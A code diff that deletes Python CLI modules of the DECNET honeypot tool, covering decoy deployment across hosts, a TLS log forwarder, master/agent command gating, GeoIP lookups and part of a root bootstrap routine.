resp = _utils._http_request("GET", base + "/swarm/hosts?host_status=enrolled")
|
||||
enrolled = resp.json()
|
||||
resp2 = _utils._http_request("GET", base + "/swarm/hosts?host_status=active")
|
||||
active = resp2.json()
|
||||
workers = [*enrolled, *active]
|
||||
if not workers:
|
||||
console.print("[red]No enrolled workers — run `decnet swarm enroll ...` first.[/]")
|
||||
raise typer.Exit(1)
|
||||
|
||||
assigned: list = []
|
||||
for idx, d in enumerate(config.deckies):
|
||||
target = workers[idx % len(workers)]
|
||||
assigned.append(d.model_copy(update={"host_uuid": target["uuid"]}))
|
||||
config = config.model_copy(update={"deckies": assigned})
|
||||
|
||||
body = {"config": config.model_dump(mode="json"), "dry_run": dry_run, "no_cache": no_cache}
|
||||
console.print(f"[cyan]Dispatching {len(config.deckies)} deckies across {len(workers)} worker(s)...[/]")
|
||||
resp3 = _utils._http_request("POST", base + "/swarm/deploy", json_body=body, timeout=900.0)
|
||||
results = resp3.json().get("results", [])
|
||||
|
||||
table = Table(title="SWARM deploy results")
|
||||
for col in ("worker", "host_uuid", "ok", "detail"):
|
||||
table.add_column(col)
|
||||
any_failed = False
|
||||
for r in results:
|
||||
ok = bool(r.get("ok"))
|
||||
if not ok:
|
||||
any_failed = True
|
||||
detail = r.get("detail")
|
||||
if isinstance(detail, dict):
|
||||
detail = detail.get("status") or "ok"
|
||||
table.add_row(
|
||||
str(r.get("host_name") or ""),
|
||||
str(r.get("host_uuid") or ""),
|
||||
"[green]yes[/]" if ok else "[red]no[/]",
|
||||
str(detail)[:80],
|
||||
)
|
||||
console.print(table)
|
||||
if any_failed:
|
||||
raise typer.Exit(1)
|
||||
|
||||
|
||||
def register(app: typer.Typer) -> None:
|
||||
@app.command()
|
||||
def deploy(
|
||||
mode: str = typer.Option("unihost", "--mode", "-m", help="Deployment mode: unihost | swarm"),
|
||||
deckies: Optional[int] = typer.Option(None, "--deckies", "-n", help="Number of deckies to deploy (required without --config)", min=1),
|
||||
interface: Optional[str] = typer.Option(None, "--interface", "-i", help="Host NIC (auto-detected if omitted)"),
|
||||
subnet: Optional[str] = typer.Option(None, "--subnet", help="LAN subnet CIDR (auto-detected if omitted)"),
|
||||
ip_start: Optional[str] = typer.Option(None, "--ip-start", help="First decky IP (auto if omitted)"),
|
||||
services: Optional[str] = typer.Option(None, "--services", help="Comma-separated services, e.g. ssh,smb,rdp"),
|
||||
randomize_services: bool = typer.Option(False, "--randomize-services", help="Assign random services to each decky"),
|
||||
distro: Optional[str] = typer.Option(None, "--distro", help="Comma-separated distro slugs, e.g. debian,ubuntu22,rocky9"),
|
||||
randomize_distros: bool = typer.Option(False, "--randomize-distros", help="Assign a random distro to each decky"),
|
||||
log_file: Optional[str] = typer.Option(DECNET_INGEST_LOG_FILE, "--log-file", help="Host path for the collector to write RFC 5424 logs (e.g. /var/log/decnet/decnet.log)"),
|
||||
archetype_name: Optional[str] = typer.Option(None, "--archetype", "-a", help="Machine archetype slug (e.g. linux-server, windows-workstation)"),
|
||||
mutate_interval: Optional[int] = typer.Option(30, "--mutate-interval", help="Automatically rotate services every N minutes"),
|
||||
dry_run: bool = typer.Option(False, "--dry-run", help="Generate compose file without starting containers"),
|
||||
no_cache: bool = typer.Option(False, "--no-cache", help="Force rebuild all images, ignoring Docker layer cache"),
|
||||
parallel: bool = typer.Option(False, "--parallel", help="Build all images concurrently (enables BuildKit, separates build from up)"),
|
||||
ipvlan: bool = typer.Option(False, "--ipvlan", help="Use IPvlan L2 instead of MACVLAN (required on WiFi interfaces)"),
|
||||
config_file: Optional[str] = typer.Option(None, "--config", "-c", help="Path to INI config file"),
|
||||
api: bool = typer.Option(False, "--api", help="Start the FastAPI backend to ingest and serve logs"),
|
||||
api_port: int = typer.Option(8000, "--api-port", help="Port for the backend API"),
|
||||
daemon: bool = typer.Option(False, "--daemon", help="Detach to background as a daemon process"),
|
||||
) -> None:
|
||||
"""Deploy deckies to the LAN."""
|
||||
import os
|
||||
import subprocess # nosec B404
|
||||
import sys
|
||||
from pathlib import Path as _Path
|
||||
|
||||
_require_master_mode("deploy")
|
||||
if daemon:
|
||||
log.info("deploy daemonizing mode=%s deckies=%s", mode, deckies)
|
||||
_utils._daemonize()
|
||||
|
||||
log.info("deploy command invoked mode=%s deckies=%s dry_run=%s", mode, deckies, dry_run)
|
||||
if mode not in ("unihost", "swarm"):
|
||||
console.print("[red]--mode must be 'unihost' or 'swarm'[/]")
|
||||
raise typer.Exit(1)
|
||||
|
||||
if config_file:
|
||||
try:
|
||||
ini = load_ini(config_file)
|
||||
except FileNotFoundError as e:
|
||||
console.print(f"[red]{e}[/]")
|
||||
raise typer.Exit(1)
|
||||
|
||||
iface = interface or ini.interface or detect_interface()
|
||||
subnet_cidr = subnet or ini.subnet
|
||||
effective_gateway = ini.gateway
|
||||
if subnet_cidr is None:
|
||||
subnet_cidr, effective_gateway = detect_subnet(iface)
|
||||
elif effective_gateway is None:
|
||||
_, effective_gateway = detect_subnet(iface)
|
||||
|
||||
host_ip = get_host_ip(iface)
|
||||
console.print(f"[dim]Config:[/] {config_file} [dim]Interface:[/] {iface} "
|
||||
f"[dim]Subnet:[/] {subnet_cidr} [dim]Gateway:[/] {effective_gateway} "
|
||||
f"[dim]Host IP:[/] {host_ip}")
|
||||
|
||||
if ini.custom_services:
|
||||
from decnet.custom_service import CustomService
|
||||
from decnet.services.registry import register_custom_service
|
||||
for cs in ini.custom_services:
|
||||
register_custom_service(
|
||||
CustomService(
|
||||
name=cs.name,
|
||||
image=cs.image,
|
||||
exec_cmd=cs.exec_cmd,
|
||||
ports=cs.ports,
|
||||
)
|
||||
)
|
||||
|
||||
effective_log_file = log_file
|
||||
try:
|
||||
decky_configs = build_deckies_from_ini(
|
||||
ini, subnet_cidr, effective_gateway, host_ip, randomize_services, cli_mutate_interval=mutate_interval
|
||||
)
|
||||
except ValueError as e:
|
||||
console.print(f"[red]{e}[/]")
|
||||
raise typer.Exit(1)
|
||||
else:
|
||||
if deckies is None:
|
||||
console.print("[red]--deckies is required when --config is not used.[/]")
|
||||
raise typer.Exit(1)
|
||||
|
||||
services_list = [s.strip() for s in services.split(",")] if services else None
|
||||
if services_list:
|
||||
known = set(all_service_names())
|
||||
unknown = [s for s in services_list if s not in known]
|
||||
if unknown:
|
||||
console.print(f"[red]Unknown service(s): {unknown}. Available: {all_service_names()}[/]")
|
||||
raise typer.Exit(1)
|
||||
|
||||
arch: Archetype | None = None
|
||||
if archetype_name:
|
||||
try:
|
||||
arch = get_archetype(archetype_name)
|
||||
except ValueError as e:
|
||||
console.print(f"[red]{e}[/]")
|
||||
raise typer.Exit(1)
|
||||
|
||||
if not services_list and not randomize_services and not arch:
|
||||
console.print("[red]Specify --services, --archetype, or --randomize-services.[/]")
|
||||
raise typer.Exit(1)
|
||||
|
||||
iface = interface or detect_interface()
|
||||
if subnet is None:
|
||||
subnet_cidr, effective_gateway = detect_subnet(iface)
|
||||
else:
|
||||
subnet_cidr = subnet
|
||||
_, effective_gateway = detect_subnet(iface)
|
||||
|
||||
host_ip = get_host_ip(iface)
|
||||
console.print(f"[dim]Interface:[/] {iface} [dim]Subnet:[/] {subnet_cidr} "
|
||||
f"[dim]Gateway:[/] {effective_gateway} [dim]Host IP:[/] {host_ip}")
|
||||
|
||||
distros_list = [d.strip() for d in distro.split(",")] if distro else None
|
||||
if distros_list:
|
||||
try:
|
||||
for slug in distros_list:
|
||||
get_distro(slug)
|
||||
except ValueError as e:
|
||||
console.print(f"[red]{e}[/]")
|
||||
raise typer.Exit(1)
|
||||
|
||||
ips = allocate_ips(subnet_cidr, effective_gateway, host_ip, deckies, ip_start)
|
||||
decky_configs = build_deckies(
|
||||
deckies, ips, services_list, randomize_services,
|
||||
distros_explicit=distros_list, randomize_distros=randomize_distros,
|
||||
archetype=arch, mutate_interval=mutate_interval,
|
||||
)
|
||||
effective_log_file = log_file
|
||||
|
||||
if api and not effective_log_file:
|
||||
effective_log_file = os.path.join(os.getcwd(), "decnet.log")
|
||||
console.print(f"[cyan]API mode enabled: defaulting log-file to {effective_log_file}[/]")
|
||||
|
||||
config = DecnetConfig(
|
||||
mode=mode,
|
||||
interface=iface,
|
||||
subnet=subnet_cidr,
|
||||
gateway=effective_gateway,
|
||||
deckies=decky_configs,
|
||||
log_file=effective_log_file,
|
||||
ipvlan=ipvlan,
|
||||
mutate_interval=mutate_interval,
|
||||
)
|
||||
|
||||
log.debug("deploy: config built deckies=%d interface=%s subnet=%s", len(config.deckies), config.interface, config.subnet)
|
||||
|
||||
if mode == "swarm":
|
||||
_deploy_swarm(config, dry_run=dry_run, no_cache=no_cache)
|
||||
if dry_run:
|
||||
log.info("deploy: swarm dry-run complete, no workers dispatched")
|
||||
else:
|
||||
log.info("deploy: swarm deployment complete deckies=%d", len(config.deckies))
|
||||
return
|
||||
|
||||
from decnet.engine import deploy as _deploy
|
||||
_deploy(config, dry_run=dry_run, no_cache=no_cache, parallel=parallel)
|
||||
if dry_run:
|
||||
log.info("deploy: dry-run complete, no containers started")
|
||||
else:
|
||||
log.info("deploy: deployment complete deckies=%d", len(config.deckies))
|
||||
|
||||
if mutate_interval is not None and not dry_run:
|
||||
console.print(f"[green]Starting DECNET Mutator watcher in the background (interval: {mutate_interval}m)...[/]")
|
||||
try:
|
||||
subprocess.Popen( # nosec B603
|
||||
[sys.executable, "-m", "decnet.cli", "mutate", "--watch"],
|
||||
stdout=subprocess.DEVNULL,
|
||||
stderr=subprocess.STDOUT,
|
||||
start_new_session=True,
|
||||
)
|
||||
except (FileNotFoundError, subprocess.SubprocessError):
|
||||
console.print("[red]Failed to start mutator watcher.[/]")
|
||||
|
||||
if effective_log_file and not dry_run and not api:
|
||||
_collector_err = _Path(effective_log_file).with_suffix(".collector.log")
|
||||
console.print(f"[bold cyan]Starting log collector[/] → {effective_log_file}")
|
||||
subprocess.Popen( # nosec B603
|
||||
[sys.executable, "-m", "decnet.cli", "collect", "--log-file", str(effective_log_file)],
|
||||
stdin=subprocess.DEVNULL,
|
||||
stdout=open(_collector_err, "a"),
|
||||
stderr=subprocess.STDOUT,
|
||||
start_new_session=True,
|
||||
)
|
||||
|
||||
if api and not dry_run:
|
||||
console.print(f"[green]Starting DECNET API on port {api_port}...[/]")
|
||||
_env: dict[str, str] = os.environ.copy()
|
||||
_env["DECNET_INGEST_LOG_FILE"] = str(effective_log_file or "")
|
||||
try:
|
||||
subprocess.Popen( # nosec B603
|
||||
[sys.executable, "-m", "uvicorn", "decnet.web.api:app", "--host", DECNET_API_HOST, "--port", str(api_port)],
|
||||
env=_env,
|
||||
stdout=subprocess.DEVNULL,
|
||||
stderr=subprocess.STDOUT
|
||||
)
|
||||
console.print(f"[dim]API running at http://{DECNET_API_HOST}:{api_port}[/]")
|
||||
except (FileNotFoundError, subprocess.SubprocessError):
|
||||
console.print("[red]Failed to start API. Ensure 'uvicorn' is installed in the current environment.[/]")
|
||||
|
||||
if effective_log_file and not dry_run:
|
||||
console.print("[bold cyan]Starting DECNET-PROBER[/] (auto-discovers attackers from log stream)")
|
||||
try:
|
||||
subprocess.Popen( # nosec B603
|
||||
[sys.executable, "-m", "decnet.cli", "probe", "--daemon", "--log-file", str(effective_log_file)],
|
||||
stdin=subprocess.DEVNULL,
|
||||
stdout=subprocess.DEVNULL,
|
||||
stderr=subprocess.STDOUT,
|
||||
start_new_session=True,
|
||||
)
|
||||
except (FileNotFoundError, subprocess.SubprocessError):
|
||||
console.print("[red]Failed to start DECNET-PROBER.[/]")
|
||||
|
||||
if effective_log_file and not dry_run:
|
||||
console.print("[bold cyan]Starting DECNET-PROFILER[/] (builds attacker profiles from log stream)")
|
||||
try:
|
||||
subprocess.Popen( # nosec B603
|
||||
[sys.executable, "-m", "decnet.cli", "profiler", "--daemon"],
|
||||
stdin=subprocess.DEVNULL,
|
||||
stdout=subprocess.DEVNULL,
|
||||
stderr=subprocess.STDOUT,
|
||||
start_new_session=True,
|
||||
)
|
||||
except (FileNotFoundError, subprocess.SubprocessError):
|
||||
console.print("[red]Failed to start DECNET-PROFILER.[/]")
|
||||
|
||||
if effective_log_file and not dry_run:
|
||||
console.print("[bold cyan]Starting DECNET-SNIFFER[/] (passive network capture)")
|
||||
try:
|
||||
subprocess.Popen( # nosec B603
|
||||
[sys.executable, "-m", "decnet.cli", "sniffer", "--daemon", "--log-file", str(effective_log_file)],
|
||||
stdin=subprocess.DEVNULL,
|
||||
stdout=subprocess.DEVNULL,
|
||||
stderr=subprocess.STDOUT,
|
||||
start_new_session=True,
|
||||
)
|
||||
except (FileNotFoundError, subprocess.SubprocessError):
|
||||
console.print("[red]Failed to start DECNET-SNIFFER.[/]")
|
||||
@@ -1,74 +0,0 @@
|
||||
from __future__ import annotations
|
||||
|
||||
import asyncio
|
||||
import pathlib
|
||||
import signal
|
||||
from typing import Optional
|
||||
|
||||
import typer
|
||||
|
||||
from decnet.env import DECNET_INGEST_LOG_FILE
|
||||
|
||||
from . import utils as _utils
|
||||
from .utils import console, log
|
||||
|
||||
|
||||
def register(app: typer.Typer) -> None:
|
||||
@app.command()
|
||||
def forwarder(
|
||||
master_host: Optional[str] = typer.Option(None, "--master-host", help="Master listener hostname/IP (default: $DECNET_SWARM_MASTER_HOST)"),
|
||||
master_port: int = typer.Option(6514, "--master-port", help="Master listener TCP port (RFC 5425 default 6514)"),
|
||||
log_file: Optional[str] = typer.Option(DECNET_INGEST_LOG_FILE, "--log-file", help="Local RFC 5424 file to tail and forward"),
|
||||
agent_dir: Optional[str] = typer.Option(None, "--agent-dir", help="Worker cert bundle dir (default: ~/.decnet/agent)"),
|
||||
state_db: Optional[str] = typer.Option(None, "--state-db", help="Forwarder offset SQLite path (default: <agent_dir>/forwarder.db)"),
|
||||
poll_interval: float = typer.Option(0.5, "--poll-interval", help="Seconds between log file stat checks"),
|
||||
daemon: bool = typer.Option(False, "--daemon", "-d", help="Detach to background as a daemon process"),
|
||||
) -> None:
|
||||
"""Run the worker-side syslog-over-TLS forwarder (RFC 5425, mTLS to master:6514)."""
|
||||
from decnet.env import DECNET_SWARM_MASTER_HOST
|
||||
from decnet.swarm import pki
|
||||
from decnet.swarm.log_forwarder import ForwarderConfig, run_forwarder
|
||||
|
||||
resolved_host = master_host or DECNET_SWARM_MASTER_HOST
|
||||
if not resolved_host:
|
||||
console.print("[red]--master-host is required (or set DECNET_SWARM_MASTER_HOST).[/]")
|
||||
raise typer.Exit(2)
|
||||
|
||||
resolved_agent_dir = pathlib.Path(agent_dir) if agent_dir else pki.DEFAULT_AGENT_DIR
|
||||
if not (resolved_agent_dir / "worker.crt").exists():
|
||||
console.print(f"[red]No worker cert bundle at {resolved_agent_dir} — enroll from the master first.[/]")
|
||||
raise typer.Exit(2)
|
||||
|
||||
if not log_file:
|
||||
console.print("[red]--log-file is required.[/]")
|
||||
raise typer.Exit(2)
|
||||
|
||||
cfg = ForwarderConfig(
|
||||
log_path=pathlib.Path(log_file),
|
||||
master_host=resolved_host,
|
||||
master_port=master_port,
|
||||
agent_dir=resolved_agent_dir,
|
||||
state_db=pathlib.Path(state_db) if state_db else None,
|
||||
)
|
||||
|
||||
if daemon:
|
||||
log.info("forwarder daemonizing master=%s:%d log=%s", resolved_host, master_port, log_file)
|
||||
_utils._daemonize()
|
||||
|
||||
log.info("forwarder command invoked master=%s:%d log=%s", resolved_host, master_port, log_file)
|
||||
console.print(f"[green]Starting DECNET forwarder → {resolved_host}:{master_port} (mTLS)...[/]")
|
||||
|
||||
async def _main() -> None:
|
||||
stop = asyncio.Event()
|
||||
loop = asyncio.get_running_loop()
|
||||
for sig in (signal.SIGTERM, signal.SIGINT):
|
||||
try:
|
||||
loop.add_signal_handler(sig, stop.set)
|
||||
except (NotImplementedError, RuntimeError): # pragma: no cover
|
||||
pass
|
||||
await run_forwarder(cfg, poll_interval=poll_interval, stop_event=stop)
|
||||
|
||||
try:
|
||||
asyncio.run(_main())
|
||||
except KeyboardInterrupt:
|
||||
pass
|
||||
@@ -1,73 +0,0 @@
|
||||
"""Role-based CLI gating.
|
||||
|
||||
MAINTAINERS: when you add a new Typer command (or add_typer group) that is
|
||||
master-only, register its name in MASTER_ONLY_COMMANDS / MASTER_ONLY_GROUPS
|
||||
below. The gate is the only thing that:
|
||||
(a) hides the command from `decnet --help` on worker hosts, and
|
||||
(b) prevents a misconfigured worker from invoking master-side logic.
|
||||
Forgetting to register a new command is a role-boundary bug. Grep for
|
||||
MASTER_ONLY when touching command registration.
|
||||
|
||||
Worker-legitimate commands (NOT in these sets): agent, updater, forwarder,
|
||||
status, collect, probe, sniffer. Agents run deckies locally and should be
|
||||
able to inspect them + run the per-host microservices (collector streams
|
||||
container logs, prober characterizes attackers hitting this host, sniffer
|
||||
captures traffic). Mutator and Profiler stay master-only: the mutator
|
||||
orchestrates respawns across the swarm; the profiler rebuilds attacker
|
||||
profiles against the master DB (no per-host DB exists).
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import os
|
||||
|
||||
import typer
|
||||
|
||||
from .utils import console
|
||||
|
||||
MASTER_ONLY_COMMANDS: frozenset[str] = frozenset({
|
||||
"api", "swarmctl", "deploy", "redeploy", "teardown",
|
||||
"mutate", "listener", "profiler",
|
||||
"services", "distros", "correlate", "archetypes", "web",
|
||||
"db-reset", "init", "webhook", "clusterer", "campaign-clusterer",
|
||||
})
|
||||
MASTER_ONLY_GROUPS: frozenset[str] = frozenset(
|
||||
{"swarm", "topology", "geoip", "realism"}
|
||||
)
|
||||
|
||||
|
||||
def _agent_mode_active() -> bool:
|
||||
"""True when the host is configured as an agent AND master commands are
|
||||
disallowed (the default for agents). Workers overriding this explicitly
|
||||
set DECNET_DISALLOW_MASTER=false to opt into hybrid use."""
|
||||
mode = os.environ.get("DECNET_MODE", "master").lower()
|
||||
disallow = os.environ.get("DECNET_DISALLOW_MASTER", "true").lower() == "true"
|
||||
return mode == "agent" and disallow
|
||||
|
||||
|
||||
def _require_master_mode(command_name: str) -> None:
|
||||
"""Defence-in-depth: called at the top of every master-only command body.
|
||||
|
||||
The registration-time gate in _gate_commands_by_mode() already hides
|
||||
these commands from Typer's dispatch table, but this check protects
|
||||
against direct function imports (e.g. from tests or third-party tools)
|
||||
that would bypass Typer entirely."""
|
||||
if _agent_mode_active():
|
||||
console.print(
|
||||
f"[red]`decnet {command_name}` is a master-only command; this host "
|
||||
f"is configured as an agent (DECNET_MODE=agent).[/]"
|
||||
)
|
||||
raise typer.Exit(1)
|
||||
|
||||
|
||||
def _gate_commands_by_mode(_app: typer.Typer) -> None:
|
||||
if not _agent_mode_active():
|
||||
return
|
||||
_app.registered_commands = [
|
||||
c for c in _app.registered_commands
|
||||
if (c.name or c.callback.__name__) not in MASTER_ONLY_COMMANDS
|
||||
]
|
||||
_app.registered_groups = [
|
||||
g for g in _app.registered_groups
|
||||
if g.name not in MASTER_ONLY_GROUPS
|
||||
]
|
||||
@@ -1,59 +0,0 @@
|
||||
"""GeoIP CLI — refresh and lookup subcommands (master-only).
|
||||
|
||||
Usage::
|
||||
|
||||
decnet geoip refresh # re-download RIR files and rebuild the index
|
||||
decnet geoip lookup 8.8.8.8 # one-shot IP -> country dump
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import typer
|
||||
|
||||
from .gating import _require_master_mode
|
||||
from .utils import console, log
|
||||
|
||||
_group = typer.Typer(
|
||||
name="geoip",
|
||||
help="GeoIP provider management (master only).",
|
||||
no_args_is_help=True,
|
||||
)
|
||||
|
||||
|
||||
@_group.command("refresh")
|
||||
def _refresh() -> None:
|
||||
"""Force re-download of the GeoIP provider data and rebuild the index."""
|
||||
_require_master_mode("geoip refresh")
|
||||
from decnet.geoip import get_lookup
|
||||
from decnet.geoip.factory import get_provider
|
||||
|
||||
provider = get_provider()
|
||||
log.info("geoip: forcing refresh via %s provider", provider.name)
|
||||
console.print(f"[bold cyan]Refreshing {provider.name} GeoIP data…[/]")
|
||||
try:
|
||||
lookup = get_lookup(force_refresh=True)
|
||||
except Exception as exc: # noqa: BLE001
|
||||
console.print(f"[red]refresh failed: {exc}[/]")
|
||||
raise typer.Exit(1) from exc
|
||||
console.print(
|
||||
f"[green]OK[/] {provider.name} index rebuilt "
|
||||
f"({len(lookup)} ranges)."
|
||||
)
|
||||
|
||||
|
||||
@_group.command("lookup")
|
||||
def _lookup(
|
||||
ip: str = typer.Argument(..., help="IP address to resolve."),
|
||||
) -> None:
|
||||
"""Print the country code for an IP (or 'unknown')."""
|
||||
_require_master_mode("geoip lookup")
|
||||
from decnet.geoip import enrich_ip
|
||||
|
||||
cc, source = enrich_ip(ip)
|
||||
if cc is None:
|
||||
console.print(f"{ip} [yellow]unknown[/]")
|
||||
raise typer.Exit(0)
|
||||
console.print(f"{ip} [green]cc={cc}[/] source={source}")
|
||||
|
||||
|
||||
def register(app: typer.Typer) -> None:
|
||||
app.add_typer(_group, name="geoip")
|
||||
@@ -1,843 +0,0 @@
|
||||
"""
|
||||
`decnet init` — one-shot master-host bootstrap.
|
||||
|
||||
Idempotent: running it twice is a no-op on already-configured items.
|
||||
Takes a freshly ``pip install``'d DECNET and turns it into a ready-to-
|
||||
run master host: creates the ``decnet`` system user/group, installs
|
||||
the systemd units + polkit rule + tmpfiles.d entry, seeds the
|
||||
directory layout, drops a placeholder config, and starts the
|
||||
``decnet.target`` grouping unit.
|
||||
|
||||
Requires root. Uses ``subprocess.run`` (never ``shell=True``) for every
|
||||
privileged call so the full argv surface is auditable.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import grp
|
||||
import hashlib
|
||||
import os
|
||||
import pwd
|
||||
import shutil
|
||||
import subprocess # nosec B404
|
||||
import sys
|
||||
from pathlib import Path
|
||||
from typing import Callable, List, Optional
|
||||
|
||||
import typer
|
||||
from jinja2 import Environment, FileSystemLoader, StrictUndefined
|
||||
|
||||
import decnet as _decnet_pkg
|
||||
from .gating import _require_master_mode
|
||||
from .utils import console, log
|
||||
|
||||
|
||||
_CONFIG_PLACEHOLDER = """\
|
||||
# /etc/decnet/decnet.ini — DECNET host config.
|
||||
#
|
||||
# Every key is OPTIONAL. Absent keys fall through to env-var defaults
|
||||
# defined in decnet/env.py. Real env vars always win over this file
|
||||
# (precedence: env > INI > default), so systemd EnvironmentFile= and
|
||||
# one-off `DECNET_FOO=bar decnet ...` invocations always take effect.
|
||||
#
|
||||
# Secrets (JWT, admin password, DB password) intentionally DO NOT
|
||||
# live here. Put them in /opt/decnet/.env.local or the systemd
|
||||
# EnvironmentFile= — never in a group-readable INI.
|
||||
|
||||
[decnet]
|
||||
# mode = master # or "agent"
|
||||
|
||||
# [api]
|
||||
# host = 127.0.0.1
|
||||
# port = 8000
|
||||
|
||||
# [web]
|
||||
# host = 127.0.0.1
|
||||
# port = 8080
|
||||
# admin-user = admin
|
||||
# cors-origins = http://localhost:8080 # comma-separated
|
||||
|
||||
# [database]
|
||||
# type = sqlite # or "mysql"
|
||||
# url = mysql+asyncmy://user@host:3306/decnet # if set, wins over host/port/name/user
|
||||
# host = localhost
|
||||
# port = 3306
|
||||
# name = decnet
|
||||
# user = decnet
|
||||
|
||||
# [bus]
|
||||
# enabled = true
|
||||
# type = unix # or "fake"
|
||||
# socket = /run/decnet/bus.sock
|
||||
# group = decnet
|
||||
|
||||
# [swarm]
|
||||
# master-host = 10.0.0.1
|
||||
# syslog-port = 6514
|
||||
# swarmctl-port = 8770
|
||||
|
||||
# [logging]
|
||||
# system-log = /var/log/decnet/decnet.system.log
|
||||
# ingest-log = /var/log/decnet/decnet.log
|
||||
# agent-log = /var/log/decnet/agent.log
|
||||
|
||||
# [ingester]
|
||||
# batch-size = 100
|
||||
# batch-max-wait-ms = 250
|
||||
|
||||
# [tracing]
|
||||
# enabled = false
|
||||
# otel-endpoint = http://localhost:4317
|
||||
|
||||
# [agent]
|
||||
# Managed by the enroll bundle — do NOT edit by hand on an agent host.
|
||||
"""
|
||||
|
||||
|
||||
def _deploy_root() -> Path:
|
||||
"""Resolve the on-disk ``deploy/`` directory of the installed package.
|
||||
|
||||
Editable install (``pip install -e .``): sibling of the ``decnet``
|
||||
package at repo root. Wheel installs aren't supported yet — the
|
||||
error message tells the operator to use an editable install.
|
||||
"""
|
||||
root = Path(_decnet_pkg.__file__).resolve().parent.parent / "deploy"
|
||||
if not (root / "decnet.target").is_file():
|
||||
raise RuntimeError(
|
||||
f"cannot locate deploy/ directory (looked at {root}); "
|
||||
"are you on a wheel install that didn't bundle deploy/? "
|
||||
"use `pip install -e .` from a git checkout"
|
||||
)
|
||||
return root
|
||||
|
||||
|
||||
def _sha256(path: Path) -> str:
|
||||
h = hashlib.sha256()
|
||||
h.update(path.read_bytes())
|
||||
return h.hexdigest()
|
||||
|
||||
|
||||
def _run(argv: List[str], *, dry_run: bool) -> None:
|
||||
if dry_run:
|
||||
console.print(f" [dim]would run:[/] {' '.join(argv)}")
|
||||
return
|
||||
log.info("init: exec %s", argv)
|
||||
subprocess.run(argv, check=True) # nosec B603
|
||||
|
||||
|
||||
def _step(label: str, action: Callable[[], str]) -> bool:
|
||||
"""Run ``action``, print a checklist line.
|
||||
|
||||
The callable returns the human-readable outcome verb:
|
||||
``"ok"`` → ``[ OK ] <label>``,
|
||||
``"skip: <reason>"`` → ``[SKIP] <label> (<reason>)``.
|
||||
Any exception becomes ``[FAIL] <label>: <err>`` and re-raises.
|
||||
"""
|
||||
try:
|
||||
result = action()
|
||||
except Exception as exc: # noqa: BLE001
|
||||
console.print(f"[red][FAIL][/] {label}: {exc}")
|
||||
raise
|
||||
if result.startswith("skip:"):
|
||||
reason = result[len("skip:") :].strip()
|
||||
console.print(f"[yellow][SKIP][/] {label} ({reason})")
|
||||
else:
|
||||
console.print(f"[green][ OK ][/] {label}")
|
||||
return True
|
||||
|
||||
|
||||
def _ensure_group(group: str, *, dry_run: bool) -> str:
|
||||
try:
|
||||
grp.getgrnam(group)
|
||||
return f"skip: group {group} already exists"
|
||||
except KeyError:
|
||||
_run(["groupadd", "--system", group], dry_run=dry_run)
|
||||
return "ok"
|
||||
|
||||
|
||||
def _ensure_user(user: str, group: str, install_dir: str, *, dry_run: bool) -> str:
|
||||
try:
|
||||
pwd.getpwnam(user)
|
||||
return f"skip: user {user} already exists"
|
||||
except KeyError:
|
||||
_run(
|
||||
[
|
||||
"useradd", "--system",
|
||||
"--gid", group,
|
||||
"--home-dir", install_dir,
|
||||
"--shell", "/usr/sbin/nologin",
|
||||
"--comment", "DECNET honeypot",
|
||||
user,
|
||||
],
|
||||
dry_run=dry_run,
|
||||
)
|
||||
return "ok"
|
||||
|
||||
|
||||
def _ensure_dir(
|
||||
path: Path, *, mode: int, owner: str, group: str, dry_run: bool
|
||||
) -> str:
|
||||
existed = path.exists()
|
||||
if dry_run:
|
||||
console.print(
|
||||
f" [dim]would ensure dir:[/] {path} (mode={oct(mode)}, "
|
||||
f"owner={owner}:{group})"
|
||||
)
|
||||
return "skip: dry-run" if existed else "ok"
|
||||
path.mkdir(parents=True, exist_ok=True)
|
||||
try:
|
||||
os.chmod(path, mode)
|
||||
uid = pwd.getpwnam(owner).pw_uid
|
||||
gid = grp.getgrnam(group).gr_gid
|
||||
os.chown(path, uid, gid)
|
||||
except (KeyError, PermissionError):
|
||||
# owner/group not yet created, or we're not root (--prefix tests).
|
||||
# mkdir is the load-bearing part; perm bits come back on the real
|
||||
# root run.
|
||||
pass
|
||||
return f"skip: {path} already present" if existed else "ok"
|
||||
|
||||
|
||||
def _ensure_config(path: Path, group: str, *, dry_run: bool) -> str:
|
||||
if path.exists():
|
||||
return f"skip: {path} already present"
|
||||
if dry_run:
|
||||
console.print(f" [dim]would write:[/] {path}")
|
||||
return "ok"
|
||||
path.parent.mkdir(parents=True, exist_ok=True)
|
||||
path.write_text(_CONFIG_PLACEHOLDER)
|
||||
try:
|
||||
os.chmod(path, 0o640)
|
||||
gid = grp.getgrnam(group).gr_gid
|
||||
os.chown(path, 0, gid)
|
||||
except (KeyError, PermissionError):
|
||||
pass
|
||||
return "ok"
|
||||
|
||||
|
||||
def _copy_if_changed(
|
||||
src: Path, dst: Path, *, mode: int, force: bool, dry_run: bool
|
||||
) -> str:
|
||||
if dst.exists() and not force and _sha256(src) == _sha256(dst):
|
||||
return f"skip: {dst} up to date"
|
||||
if dry_run:
|
||||
console.print(f" [dim]would install:[/] {src} -> {dst} (mode={oct(mode)})")
|
||||
return "ok"
|
||||
dst.parent.mkdir(parents=True, exist_ok=True)
|
||||
shutil.copy2(src, dst)
|
||||
try:
|
||||
os.chmod(dst, mode)
|
||||
os.chown(dst, 0, 0)
|
||||
except PermissionError:
|
||||
pass
|
||||
return "ok"
|
||||
|
||||
|
||||
def _render_template(src: Path, context: dict[str, str]) -> str:
|
||||
"""Render a Jinja2 .j2 template with the given context.
|
||||
|
||||
StrictUndefined: a missing context variable is an error, not a
|
||||
silent empty-string substitution — that way a typo in the template
|
||||
fails loudly instead of shipping a broken systemd unit.
|
||||
"""
|
||||
env = Environment(
|
||||
loader=FileSystemLoader(str(src.parent)),
|
||||
undefined=StrictUndefined,
|
||||
keep_trailing_newline=True,
|
||||
autoescape=False, # nosec B701 — rendering systemd INI, not HTML
|
||||
)
|
||||
template = env.get_template(src.name)
|
||||
return template.render(**context)
|
||||
|
||||
|
||||
def _write_rendered_if_changed(
|
||||
src: Path, dst: Path, rendered: str, *, mode: int, force: bool, dry_run: bool
|
||||
) -> str:
|
||||
"""Write *rendered* content to *dst* only if it differs from what's there.
|
||||
|
||||
SHA compares rendered-output ↔ on-disk bytes (NOT source-template ↔
|
||||
on-disk) so operators who customise their install_dir get idempotent
|
||||
re-runs instead of every ``decnet init`` rewriting files.
|
||||
"""
|
||||
